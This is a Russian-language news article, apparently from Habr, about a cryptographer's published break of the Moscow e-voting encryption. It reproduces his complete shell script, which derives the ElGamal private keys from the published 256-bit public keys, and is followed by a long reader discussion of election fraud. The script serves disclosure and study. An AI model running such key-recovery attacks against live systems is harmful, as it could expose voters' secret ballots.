Криптограф Пьеррик Годри описал уязвимость онлайн-голосования на выборах в Мосгордуму

    Один из самых известных в мире специалистов по криптографии Пьеррик Годри, директор по исследованиям Национального центра научных исследований Франции, опубликовал доклад с анализом криптографической защиты системы онлайн-голосования на выборах в Московскую городскую думу (“Breaking the encryption scheme of the Moscow internet voting system” на сайте препринтов arXiv). Согласно выводам специалиста, шифрование в российской системе электронного голосования является «совершенно небезопасным» и может быть взломано примерно за 20 минут.

    А именно, на четырёхъядерном компьютере Core i5-4590 3,3 ГГц с 16 ГБ RAM на стандартном дистрибутиве Debian подбор первого ключа в трёхуровневой схеме шифрования занял 425 секунд, второго — 507 секунд, третьего — 314 секунд, итого 1246 секунд, то есть 20 мин 46 сек.

    Пьеррик Годри отметил, что ему не известны причины, почему российские коллеги используют именно трёхуровневую схему Эль-Гамаля с маленькими размерами ключей.

    Открытое тестирование


    17 июля 2019 года в рамках тестирования системы электронного голосования исходный код некоторых модулей, построенных на блокчейне, выкладывали на GitHub. Был создан отдельный тестовый контур, полностью воспроизводящий систему, в которой будут работать пользователи 8 сентября.

    В частности, на GitHub разместили код смарт-контрактов в блокчейн-сети, библиотеку шифрования данных и специальный код, позволяющий отправлять данные в блокчейн. Смарт-контракты — это программный код, отвечающий за реализацию функционала и обеспечивающий единообразное исполнение указанного кода на всех узлах блокчейн-сети.

    Библиотека шифрования позволяет осуществлять шифрование данных с использованием пары «открытый − закрытый» ключ. Шифрование происходит при помощи открытого ключа, а закрытый ключ позволяет расшифровать данные. При этом опубликованному открытому ключу соответствует только один закрытый ключ. Код для использования смарт-контрактов позволяет отправить данные напрямую в блокчейн с веб-страницы, где находится бюллетень для голосования.

    Как отметили в Департаменте информационных технологий, «народное» тестирование должно выявить уязвимые места в системе электронного голосования и повысить уровень информационной безопасности. Так, добровольцам предложили проверить защиту инфраструктуры портала mos.ru (именно здесь 8 сентября пройдет электронное голосование на выборах в Мосгордуму в трёх округах) и серверов от возможных DDoS-атак.

    Кроме того, проверялись уязвимость портала и процесса голосования.

    Тестировались и алгоритмы шифрования. На тестовый взлом зашифрованных анонимизированных голосов хакерам отводилось 12 часов. Именно столько 8 сентября 2019 года будет длиться реальное голосование на выборах. Через 12 часов шифр менялся — и начиналась следующая попытка.

    Программное обеспечение системы выборов работает на блокчейне. Электронный анонимный бюллетень хранится в системе, к которой подключено множество пользователей. Теоретически, цепочку блоков практически невозможно взломать, так как для этого нужно проникнуть в большую часть компьютеров сети.

    Электронный бюллетень для голосования аналогичен бумажному. На процедуру голосования отводится 15 минут — за это время избиратель должен поставить знак напротив одного из кандидатов. Информация о бюллетене не сохраняется ни в браузере пользователя, ни на сервере администратора, что позволяет сохранить тайну голосования. Результат сразу отправляется в блокчейн-систему, в которой также проходит подсчет голосов.

    Найденная уязвимость


    Пьеррик Годри в своём докладе подтвердил, что создатели системы каждый день выкладывали на GitHub публичные ключи шифрования и зашифрованные ими данные, а также раскрывали информацию о приватных ключах и данных, выложенных на день раньше. Однако французский исследователь обращает внимание, что длина публичного ключа составляет 256 бит. Это позволяет вычислить приватный ключ и взломать шифрование системы примерно за 20 минут, используя обычный персональный компьютер и бесплатное программное обеспечение.

    Шелл-скрипт атаки
    ## These are commands to be run on a Linux machine (Debian or Ubuntu).
    ## The main workhorse for the discrete logarithm computations is CADO-NFS,
    ## and we use GP-Pari as a ’pocket calculator’ for modular arithmetic.
    # install some packages
    sudo apt install pari-gp jq
    sudo apt install libgmp3-dev gcc g++ cmake libhwloc-dev
    alias gpnoc="gp -q --default colors=\"no\""
    # download and compile cado-nfs
    cd /tmp
    git clone https://scm.gforge.inria.fr/anonscm/git/cado-nfs/cado-nfs.git
    cd cado-nfs
    git checkout fdae0f9f382c # most recent version at the time of writing
    make cmake
    make -j 4
    # download blockchain-voting and extract public keys
    cd /tmp
    git clone https://github.com/moscow-technologies/blockchain-voting.git
    cd blockchain-voting
    git checkout d70986b2c4da # most recent version at the time of writing
    cd /tmp
    # loop on the 3 public keys; could be done in parallel on 3 machines.
    for i in {0,1,2}; do
    start=‘date +%s‘
    # extract the public key information
    p=‘jq .modulos[$i] /tmp/blockchain-voting/encryption-keys/keys/public-key.json | tr -d \"‘
    g=‘jq .generators[$i] /tmp/blockchain-voting/encryption-keys/keys/public-key.json | tr -d \"‘
    h=‘jq .publicKeys[$i] /tmp/blockchain-voting/encryption-keys/keys/public-key.json | tr -d \"‘
    ell=‘echo "($p-1)/2" | gpnoc‘
    # run cado-nfs to get log of h (takes a few minutes)
    wdir=‘mktemp -d /tmp/cadorunXXXXXX‘
    log_h=‘/tmp/cado-nfs/cado-nfs.py -dlp -ell $ell workdir=$wdir target=$h $p‘
    # run again to get log of generator (faster, since it reuses precomputed data)
    log_g=‘/tmp/cado-nfs/cado-nfs.py $wdir/p75.parameters_snapshot.0 target=$g‘
    # deduce private key
    x=‘gpnoc <<EOF
    xell=lift(Mod($log_h,$ell)/Mod($log_g,$ell)); half=lift(1/Mod(2,$ell));
    x0=lift(Mod(2*half*xell, 2*$ell)); h0=lift(Mod($g,$p)^x0);
    if (h0 != $h, x0=lift(Mod(2*half*xell+$ell, 2*$ell)));
    x0
    EOF‘
    stop=‘date +%s‘
    echo "Private key number $((i+1)) is $x, computed in $((stop-start)) seconds."
    done

    «Не имея доступа к информации об используемом в системе протоколе, сложно точно просчитать последствия данной уязвимости и то, насколько легко злоумышленнику будет найти соответствие между бюллетенями и избирателями, хотя я полагаю, что эта слабая схема шифрования используется именно для шифрования бюллетеней. В худшем случае это может привести к тому, что выбор всех избирателей, использующих систему электронного голосования, станет публично известен, как только они проголосуют», — утверждает Годри.

    Заместитель гендиректора компании «КриптоПро» Станислав Смышляев пояснил в комментарии РБК: «Ошибка разработчиков системы электронного голосования заключается в том, что в одной из криптосистем используется ключ слишком малой длины, который не является стойким. При этом разработчики пытались усилить безопасность системы за счёт внедрения троекратного шифрования с тремя разными короткими ключами. Но в результате стойкость итоговой криптосистемы от взлома не выросла в три раза — она вообще почти не выросла. Надеюсь, что у разработчиков ещё есть время, чтобы переработать систему», — сказал Смышляев.

    Он добавил, что для избежания таких ошибок криптографические средства обычно сертифицируются в ФСБ, а системы с их использованием — исследуются. «Уверен, что любая аккредитованная ФСБ России лаборатория быстро отловила бы такую уязвимость», — говорит он. При этом, по словам Смышляева, из открытых данных до конца неясно — для чего конкретно в системе электронного голосования используется тот модуль, который смог взломать исследователь, поэтому «оценить практические последствия уязвимости в данном сегменте системы не удастся».

    Разработчик отечественных систем шифрования Дмитрий Белявский после ознакомления с докладом Годри подтвердил, что основная уязвимость системы — возможность вычислить приватный ключ по публичному из-за слишком слабых параметров (256 бит): «Исследователь в докладе описывает ещё одну уязвимость системы: даже без взлома ключей способ выбора параметров шифрования позволяет определить один бит зашифрованного текста. Дальше всё зависит от того, как именно технологически шифруется бюллетень избирателя. Если избиратель при голосовании будет выбирать из двух кандидатов, то содержательно этот один бит и есть его выбор. С другой стороны, при возможности вычислить ключи за единицы минут исследовать этот вектор атаки даже нет необходимости, так как в системе есть более важная уязвимость».

    Голосование


    Эксперимент по электронному голосованию на выборах в Мосгордуму 8 сентября пройдёт в трёх избирательных округах: № 1 (все районы Зеленограда), № 10 (Северный, Лианозово, Бибирево) и № 30 (Чертаново Центральное, Чертаново Южное).

    Примерно полмиллиона жителей столицы смогут выбрать своего депутата, не посещая избирательный участок, — с помощью компьютера, планшета или смартфона. Для участия в электронном голосовании необходимо подать заявление через личный кабинет на портале mos.ru с 24 июля по 4 сентября включительно. Участие в электронном голосовании добровольное: проголосовать можно и привычным способом, придя на участок и опустив бюллетень в избирательную урну.

    Представитель пресс-службы департамента информационных технологий (ДИТ) Москвы сообщил РБК, что там отчасти согласны с мнением, представленным в докладе: три приватных ключа по 256 бит не обеспечивают достаточную стойкость шифрования. «Такое применение было использовано только во время испытательного периода. В течение пары дней длина ключа будет изменена на 1024 бит. Обращаем внимание, что взлом схемы шифрования не был осуществлён. Мы специально выкладываем открытый ключ и зашифрованные голоса, чтобы их попытались расшифровать до публикации закрытого ключа. Взять закрытый ключ и последовательно расшифровать зашифрованные голоса можно и за 20, и за 5 минут, найдя все основания для шифрования. Однако задача была не в этом», — сказал он.

    Представитель ДИТ пообещал, что будет осуществлён переход на другой принцип формирования случайных элементов кода: «Он будет основан, как правильно отметил наш французский коллега, на уникальных транзакциях из самого браузера пользователя, а не на генераторе случайных чисел», — сказал он.
    Поделиться публикацией
    AdBlock похитил этот баннер, но баннеры не зубы — отрастут

    Подробнее
    Реклама

    Комментарии 29

      +5
      Уверен, что любая аккредитованная ФСБ России лаборатория быстро отловила бы такую уязвимость

      Конечно, куда мы без ФСБ. ФСБ — наше всё.
        –5
        Куда же без комментариев о ФСБ и том, какие они плохие… А если отрешиться от политики на техническом ресурсе, то аккредитованные лаборатории и сама ФСБ это тот пласт людей, которые реально разбираются в криптографии и её реализации, и не пропускают в продакшн подобную дичь с «тройным шифрованием». Сколько раз говорили, не изобретайте криптографию!
          +5
          Ага. Это те же самые люди, которые хотят получить «ключи от интернета».
            0
            Конечно) ФСБ всего же из 2 человек состоит. Один работает, другой руководит)
            +3
            И которые сначала говорили что sbox в кузнечике 'случайный'. После того, как зарубежные криптографы продемонстрировали алгоритм его генерации, стали говорить, что 'потеряли исходники'. пруф: habr.com/ru/company/virgilsecurity/blog/453254
            Ещё по хешу: eprint.iacr.org/2014/675
              –4
              Над этой статьей смеялись все мои знакомые криптографы, хоть немного разбирающиеся в теме. Но так как я не криптограф, то переубеждать вас в чем-то я даже не буду пытаться, это будет «Мойша мне напел, мне не понравилось».
                +3

                Вы с криптографами можете смеяться сколько угодно, но это не исключает того факта, что s-box в кузнечике не случайный.

                  –2
                  В старом ГОСТ 28147-89 тоже были разные Узлы Замены. И были определенные правила как выбирать «хороший».
                  К слову, в AES тот же S-box тоже не случайный. Но это же никого не беспокоит?
                    +3
                    В аесе алгоритм генерации sboxа описан прям в стандарте.
                    upd: речь вовсе не о том, что неслучайный sbox как-то снижает стойкость шифра и т.д., а о том, что фсб и всё, что около, готовы лгать даже в мелочах. Что вовсе исключает какое-либо доверие в немелочах.
                      –3
                      Одного из) Вряд ли кто из знающих людей расскажет публично причины и нюансы s-box. Ибо 283.
          0
          Зачем нужны формулы для очевидных вещей?
            +1

            А кто поддерживает/контролирует блокчейн? Как гарантируется его достоверность? Если серверы ЦИК, то я уже верю, что ничего не подтасуют.

              0

              Настолько все хорошо, что алгоритм вычисления итоговой суммы никто проверять уже не будет.

                –1

                А простые пользователи то могут получить доступ к блокчейну или это просто хайп без пруфов?

                  +6

                  Блокчейн, вероятно, у тех, кому "нет основания не доверять".

                    +4
                    В идеале каждый пользователь системы должен иметь возможность
                    1) проверить наличие и правильность своего бюллетеня в блокчейне;
                    2) самостоятельно посчитать итоги голосования по всему блокчейну и сравнить с официальными итогами.
                    Тогда появится доверие к системе.
                    Если же указанных выше пунктов не будет, то смысла нет.
                      +2

                      Нет, вы ошибаетесь, перечисленная вами информация не позволяет доказать или опровергнуть честность голосования. Вот вы видите в блокчейне свой голос и еще 999 999 других голосов, как вы проверите, что они соответствуют реальным людям, а не вписаны администратором сервера от их имени? Как вы найдете 100% всех людей, участвовавших в голосовании и сверите с ними результаты? Если вы не можете собрать 100% проголосовавших, то вы не можете доказать, что отсутствуют вбросы.


                      У вас в профиле написано, что вы низкоуровневый программист, и наверно очень умный человек, а пишете ерунду.

                        0
                        Да, я не говорю о строгом математическом доказательстве, но социальное доверие к системе все же можно получить.
                        Я могу попросить свою жену проверить наличие ее голоса в блокчейне, и своих знакомых я могу попросить проверить наличие своих голосов. Если все 100% мною опрошенных (пусть это будет 15 человек) скажут, что да, их голоса посчитаны правильно, то доверие к системе с моей стороны будет довольно высоким. Если кто-то из моих знакомых скажет, что не ходил на голосование и можно проверить, что его голос никто не вписал в блокчейн, то это так же увеличивает доверие. Если большинство или часть избирателей поступят так же и сделают опрос по соседям с частичной проверкой по своему кругу знакомств, и никто не обнаружит махинаций с голосом, то с довольно высокой вероятностью можно будет судить о правдоподобности голосования, разве нет?

                        Вот как здесь на картинке: я (красный) доверяю слову некоторых знакомых мне людей и они, да на словах, подтверждают мне наличие их голоса в блокчейне (вообще у каждого должен оставаться квиточек — доказательство голоса, который можно открыть для публичного просмотра в случае выявления махинации). Вы (зеленый), проверяете по своим знакомым, кто-то еще (синий) опрашивает своих знакомых. Где-то знакомые общие, где-то нет.
                        Такая система, хоть и не совершенна, но всяко лучше имеющейся в настоящее время.
                        В настоящее время я даже не уверен как мой собственный голос посчитан.
                          +1
                          Если все 100% мною опрошенных (пусть это будет 15 человек) скажут, что да, их голоса посчитаны правильно, то доверие к системе с моей стороны будет довольно высоким.

                          Это не исключает ситуации, что в блокчейне 100 000 голосов от реальных людей и 900 000 несуществующих. То есть вы поверите системе, которая на 90% сфальсифицирована.


                          Если кто-то из моих знакомых скажет, что не ходил на голосование и можно проверить, что его голос никто не вписал в блокчейн, то это так же увеличивает доверие.

                          В описанной выше схеме это возможно, и ваш знакомый увидит (если ему дадут это сделать), что его голос не учтен.


                          Если большинство или часть избирателей поступят так же и сделают опрос по соседям с частичной проверкой по своему кругу знакомств,

                          То это никак не поможет выявить 900 000 несуществующих голосов.


                          Давайте также оценим нужный для победы объем вбросов. Допустим, в округе 1 млн избирателей, из низ 30% (300К) придет на выборы, и из пришедших 30% (100К) поддерживает власть. Достаточно записать в эл. голосование еще 100К из 700К оставшихся, выбирая из пожилых одиноких людей, неблагополучных семей, алкоголиков (которые не интересуются выборами, не пользуются интернетом и которых вам трудно будет найти), бюджетников (которые побоятся что-то сказать), полиции, солдат, чтобы кандидат от власти получил гарантированную победу. Более того, можно вписать 100К несуществующих людей.


                          То есть нам надо фальсифицировать данные всего 10% из общего числа избирателей. При этом, например, перед несколькими выборами в СПб общее число избирателей как раз в результате уточнений менялось на сотню-другую тысяч человек. Как выявить эти дорисованные 100К человек?


                          Выявить несуществующие голоса можно было бы, если бы был публично доступный реестр избирателей с пометками — принял ли участие человек в обычном или эл. голосовании и какой-то хеш, который можно найти в блокчейне (похожие есть в Британии, например — там указано имя, адрес и проголосовал ли человек), но у нас вам его никто не даст, ссылаясь на защиту перс. данных и на то, что это не предусмотрено законом, что такой реестр будет использоваться для "рисования" подписей (это был аргумент члена ЦИК в ответ на претензию, почему в справке МВД при несовпадении не указывают правильные данные) итд.


                          Да даже если бы такой реестр и был, ни один российский суд не будет слушать заявления этих избирателей, когда есть официальная справка от ЦИК о том, что все посчитано честно.


                          Такая система, хоть и не совершенна, но всяко лучше имеющейся в настоящее время.

                          Чем она лучше? В бумажном голосовании вы можете стоять на участке и видеть людей, видеть, как они берут бюллетени и кладут в урну, видеть, что они голосуют без принуждения, следить за подсчетом. При этом в бумажном голосовании вы так же можете опросить своих знакомых, а те, кто не голосовал, могут прийти и убедиться, что в журнале избирателей не стоит росписи за полученный бюллетень.


                          В электронном голосовании у вас нет доступа на серверы, вы не видите, что там происходит, вы не видите, человек голосует или бот, вы не видите, есть он в журнале или нет.


                          То есть бумажное голосование содержит больше возможностей для контроля. Давайте я попробую сделать сравнение:


                          Бумажное голосование:


                          • наблюдатель видит, что бюллетень получает и опускает в урну реальный человек, а не бот
                          • наблюдатель видит, что человек голосует без принуждения
                          • наблюдатель видит, что один человек получает и опускает один бюллетень
                          • наблюдатель видит, что после голосования оставшиеся бюллетени гасятся, исключая возможность вбросить их позже, а число бюллетеней фиксируется в протоколе
                          • наблюдатель видит процедуру подсчета
                          • наблюдатель сравнивает полученный протокол и введенные в ГАС выборы данные и убеждается, что они не были подменены на этапе ввода
                          • (минус) без большого числа наблюдателей эта система не работает

                          Электронное голосование:


                          • у наблюдателя нет возможности проверить, голосует реальный или вымышленный человек, так как наблюдателям не доступные персональные данные избирателей. Это видит только администратор системы.
                          • нет возможности проверить, что избиратель голосует без принуждения
                          • нет возможности проверить, что один человек голосует один раз
                          • нет возможности проверить, что проголосовавший избиратель имеет право голосовать на выборах и прописан в данном регионе
                          • (плюс) легко убедиться в правильности суммирования голосов, при этом не зная, действительные они или фальсифицированные

                          Поясните, пожалуйста, как электронное голосование, по вашему, надежнее бумажного? Возможностей контроля в нем, на мой взгляд, гораздо меньше, чем в принятой в ельцинские времена системе бумажного голосования.


                          На мой взгляд, фальсифицировать бумажное голосование сложнее, а электронное — в разы проще. В системе с честными, независимыми судами еще есть какие-то шансы убедить судью, но в системе, где вся власть настроена против граждан, где суды и ЦИК не работают, выгоднее выбирать бумажное голосование просто потому что его фальсификация требует больше затрат труда и проще выявляется.


                          У меня ощущение, что у нас избиркомы работают не над повышением прозрачности выборов, а наоборот, ищут способы сделать их менее проверяемыми, учитывая допущенные ранее "ошибки". Например, на выборах в Калуге в справке МВД указывались "правильные" по мнению базы МВД данные избирателей (которые можно было оспорить, показав паспорт), сейчас их убрали.

                    0
                    а что если некая группа (проявив сознательность и активную жизненную позицию) проанализировав открытые и доступные (секретарша из ЦИК очень долго говорила по телефону в автобусе) источники, и применив алгоритм проверяющий истинность данных при голосовании, получив доступ обеспечат реальные результаты голосования.- насколько данный сценарий фантастичен? или такая книга/фильм/мурзилка были?
                      0

                      Да, на хабре были статьи где математически доказываются фальсификации. Данные брались из открытых источников и не сходились.
                      Но это итак все знали.

                      +14

                      Криптографы ищут уязвимость не там. Уязвимость не в том, что там есть какие-то слабости шифрования (эти слабости, скорее всего, просто из-за криворукости исполнителей и сделаны ненамеренно), а в том, что голосование идет через подконтрольные властям сервера. Соответственно, ничего не мешает властям сначала отправить от имени гражданина через госуслуги заявку, а потом зайти от имени избирателя и проголосовать.


                      Я не понимаю, почему тут есть кто-то, кто не видит этой очевидной дыры, и кто бесполезно тратит свое время на изучение особенностей Ethereum, смарт-контрактов и подобных бесполезных технологий.


                      Вот, например, на президентских выборах в 2018 году была введена система "мобильный избиратель". И для чего же использовалась эти высокие технологии? Чтобы уменьшить численность людей в списках. Чиновники оформляли от имени людей заявки о том, что петербуржец якобы хочет в день выборов проголосовать где-то в Дагестане, тем самым уменьшая число избирателей в списках и дотягивая процент явки до желаемых 70%.


                      Никаких уголовных дел, естественно, не было, возможности контролировать систему — тоже (под предлогом защиты персональных данных). Заметьте, что часть из "отписавшихся" людей обнаружила это, придя на участок. Я сам видел как минимум одного такого избирателя, но члены комиссии объясняли, что это могла быть ошибка (они могли не знать о фальсификации, так как она происходила в другом месте). То есть было очевидно, что что-то не так, но понять, почему и сделать что-то с этим было нельзя.


                      И этим летом мы видели, как они снимают кандидатов по липовым экспертизам подписей и по справке МВД, которая составлена не по форме и нарушает соглашение с ЦИК (там не указаны "сведения, отличные от указанных", чтобы у кандидата не было возможности установить причину расхождения). При этом ЦИК сначала утверждает, что все по форме, а когда им зачитывают противоречащую справке часть соглашения, говорят "ну, это сложившаяся практика, и закон о защите персональных данных не позволяет указать правильные данные". А суд игнорирует любые доводы.


                      Также, наблюдатели сравнивали число проголосовавших на видеозаписи из участка с протоколом голосования. Например, в Кабардино-Балкарии официальная явка около 95%, а по видеозапиям — от 20 до 60%, и ничего не произошло (ЦИК заявил, что проверка по видеозаписи не предусмотрена). Также, нет никаких расследований по фальсификациям в Приморье.


                      Получается такая "распределенная" система обмана: вот справка от официального органа с печатью, ни у ЦИК, ни у суда нет оснований не верить ей, а ваши доказательства и независимые экспертизы почерка рассматривать нет нужды. Весь этот правящий класс — избиркомы, чиновники, суды, полиция — сплотились как армия в защиту своих целей. Аналогично будет и с эл. голосованием — от этой системы нужен лишь отчет с печатью и подписями, который можно использовать как неопровержимое доказательство.


                      Сейчас, кстати, готовится и другая фальсификация — "дачные" участки в Псковской области для голосования на выборах губернатора Санкт-Петербурга. Камеры на участки ставить не будут.


                      Соответственно, криптографическая прочность системы не имеет никакого значения. Вот допустим, даже в блокчейне не сойдется хеш. И что вы сделаете, пойдете в суд, который скажет, что нет оснований не верить справке эксперта из МВД с печатью?


                      Более того, возможности наблюдения за системой нет. Вот появилась новая запись в блокчейне — это живой человек или бот? А если человек, то он голосует из дома или под присмотром директора своего бюджетного учреждения? Никаких данных вам, естественно, не дадут, ссылаясь на защиту персональных данных, как это было с "мобильным избирателем".


                      Ну и доказать фальсификации сложнее. Вот допустим вы сняли вброс на видео — любой человек по видео поймет, что это нарушение. А если в блокчейне хеш не сходится, или например, добавлено 1000 записей в одну и ту же секунду — как вы это объясните обычному человеку? Предложите ему скачать какую-то непонятную программу с американского сайта гитхаб? Так может это ваша программа врет, а не телевизор. И убедить людей в чем-то будет труднее, так как человек подумает "политика — грязное дело, он сам наверно хочет пролезть к кормушке и пытается меня обмануть".


                      На основании опыта предыдущих выборов, подозреваю, электронное голосование готовится властью как резерв для такого вида фальсификаций, который невозможно доказать. Когда члена избиркома ловят на вбросе, это возмущает людей. Тут же поймать на вбросе так, чтобы это было очевидно обычному избирателю, будет невозможно. Так же, как сейчас обычный избиратель не может проверить справку "эксперта"-почерковеда.

                        +1
                        Ну да. Из составляющих («анонимность», «электронное голосование», «честность выборов») можно выбрать только две, но никак не три.
                          0
                          «Я не понимаю, почему тут есть кто-то, кто не видит этой очевидной дыры»

                          — Думаю кодеры всё прекрасно видят, также как и то, что это системная/базовая ошибка, неискоренимая никакими «разделениями властей». Правящий класс контролируя денежные потоки и инфрастуктуру имеет все средства к «управлению электоратом». На Киберленинке даже статья есть «Электоральная политика России в начале ХХI века как управляемая легитимация власти». Т.е. даже в названии научной статьи указано, что «выбор» людей управляем.

                          Хабр «не про политику», но очень уж в тему цитата Ленина: — «Люди всегда были и всегда будут глупенькими жертвами обмана и самообмана в политике, пока они не научатся за любыми нравственными, религиозными, политическими, социальными фразами, заявлениями, обещаниями разыскивать интересы тех или иных классов

                          Так что ситуация как в том анекдоте: — «Э-э-э, да тут уже всю систему менять надо!»
                            0

                            Собственно они еще и пиарятся на блокчейнах, которым заодно и репутацию снижают.
                            По хорошему, пока не будет нормально независимого удостоверяющего центра, который бы мог выдавать всем голосующим ЭЦП и при этом не генерил мертвых душ, то есть как-то вообще дорожил своей репутацией, это все работать не будет.
                            А если такой центр есть, то и необходимости в блокчейне особо то и нету, сложить все голоса в одно дерево Меркла и опубликовать его хеш вместе с результатами выборов и делов то.
                            Так что блокчейн в выборах не особо рабочий механизм. Кажется в таких случаях только proof of work сработает, когда люди просто бы кидали реальные биткоины на кошельки, и у кого больше наберется, тот и победит.
                            Тогда на фальсификации придется реальные средства тратить и это станет дорого.

                              0
                              «Так что блокчейн в выборах не особо рабочий механизм. Кажется в таких случаях только proof of work сработает, когда люди просто бы кидали реальные биткоины на кошельки, и у кого больше наберется, тот и победит.
                              Тогда на фальсификации придется реальные средства тратить и это станет дорого.»


                              — Тогда победит тот, у кого больше средств в данный момент времени. А потом (для «компенсации затрат») можно будет «доить» граждан. Так что эта идея тоже не сработает.
                            • НЛО прилетело и опубликовало эту надпись здесь
                                0
                                Да. И именно поэтому элементарные ошибки в криптографии. Потому что это неважно на самом деле, можно систему взломать или нет.
                              • НЛО прилетело и опубликовало эту надпись здесь

                                Только полноправные пользователи могут оставлять комментарии. Войдите, пожалуйста.

                                Самое читаемое